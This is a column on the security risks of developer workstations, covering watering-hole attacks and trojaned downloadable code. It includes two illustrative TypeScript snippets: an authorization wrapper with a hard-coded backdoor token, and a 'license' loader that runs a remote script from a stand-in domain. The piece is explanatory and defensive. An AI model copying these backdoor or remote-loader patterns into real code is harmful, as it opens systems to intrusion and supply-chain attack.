Your secure developer workstation solution is here, finally!

Roger A. Grimes | June 20, 2017
Developer workstations are high-value targets for hackers and often vulnerable. Now you can protect them using concepts borrowed from securing system admin workstations.

For decades, one of the thorniest problems in computer security has been how to better secure developer workstations while still giving developers the elevated permissions, privileges, and freedom they need to do their jobs. All of the proposed solutions missed the mark. Then, as a side effect of trying to better secure admins, we found the answer. Finally, we have the right solution: the secure administrative workstation (SAW). Before I describe the SAW, it’s worth reviewing the challenges of securing developers’ workstations and the associated risks.

There is good reason to fear the security consequences of developers using insecure computers to do their job. Developers are often the specific targets of malicious hackers, and a compromise usually gives an attacker immediate elevated access to the most essential, mission-critical content in an enterprise. Want to take over a company or cause reputational damage pretty quickly? Compromise a developer.

This is because developers often have total control not only of their local computer and many other computers and servers, but usually of systems across multiple environments. Many companies maintain completely separate environments for production and testing. Testing may even be broken down into multiple environments (e.g., test or pre-production).

Developers often have elevated access to all of them. Heck, IT security would be ecstatic if developers didn’t use the same logon name and password across multiple environments. If a hacker compromises the top admin accounts (domain admin, forest admin, etc.) in one environment, they own that environment. Compromise a developer’s credentials, however, and you can likely become admin in all of them. It’s a hacker’s nirvana attack scenario.

There are even attack techniques aimed specifically at developers, like “watering hole” attacks, in which hackers compromise popular developer web sites known as good places to share code and troubleshoot programming problems. For example, four of the largest software development companies in the world were compromised during a single hacker campaign that placed a zero-day Java exploit on an iOS developer web site.

Another favorite, though less common, developer-specific attack involves hackers uploading a piece of code they wrote for other developers to download and use. The innocuous-looking code often solves a missing piece of the developer’s puzzle or promises improved administration of a server. Unknown to subsequent downloaders, the code includes a hidden trapdoor that allows the original creators to gain unauthorized access to the server or application later.
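To make the pattern concrete, here is a minimal, hypothetical sketch of what such a trapdoor can look like, written in TypeScript. Nothing in it comes from a real incident; the module, the `MAINT_TOKEN` value, and the `isAuthorized` wrapper are all invented for illustration.

```typescript
// Hypothetical "server admin helper" a developer might download and reuse.
// Most of the module would be genuinely useful; the trapdoor hides in the
// authorization wrapper below.

// Invented constant: a "maintenance token" only the original author knows.
const MAINT_TOKEN = "example-backdoor-token";

export interface Credentials {
  username: string;
  password: string;
}

// Looks like a harmless wrapper around the application's real validator...
export function isAuthorized(
  creds: Credentials,
  realValidator: (c: Credentials) => boolean
): boolean {
  // ...except that anyone supplying the hard-coded token skips validation
  // entirely. This is the hidden trapdoor.
  if (creds.password === MAINT_TOKEN) {
    return true;
  }
  return realValidator(creds);
}
```

In real attacks the bypass is rarely this readable; it is usually buried under obfuscation or disguised as a “debug” feature, which is exactly why code pulled from sharing sites deserves review before it runs with a developer’s elevated privileges.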

One of my favorite angles on these attacks is when the trojan horse code contains a simple HTTP link that must, according to the open source license, remain a perpetual part of the code no matter who uses it. The HTTP link initially points to an innocent source code license or coder statement. But later on, after the code has been downloaded and installed on thousands of sites, the originators change the innocent link to something more malicious, like an encoded JavaScript worm that suddenly runs for every visitor to a web site that includes the trojan horse code. It’s really genius and difficult to stop if you don’t know about such things. Developers not trained in computer security usually don’t.
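To show why that seemingly harmless “required link” matters, here is a minimal hypothetical sketch, again in TypeScript. The attribution widget, the badge.js file, and the license.example.com domain are all invented; the point is only that the linked resource is fetched and executed remotely on every visit.

```typescript
// Hypothetical client-side attribution loader bundled with the downloaded code.
// The license "requires" that this call stay in place on every page.
export function showLicenseBadge(): void {
  // The badge script is fetched live from the original author's server
  // (the domain below is invented for illustration) on every page view.
  const badge = document.createElement("script");
  badge.src = "https://license.example.com/badge.js";
  badge.async = true;
  document.head.appendChild(badge);
  // Whatever badge.js serves today runs in every visitor's browser. If the
  // author later swaps it for malicious JavaScript, every site that kept the
  // "required" loader delivers that payload automatically.
}
```

Because the payload lives on a server the original author controls, the downstream sites never see any change in their own repositories when the innocent file is replaced.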

 
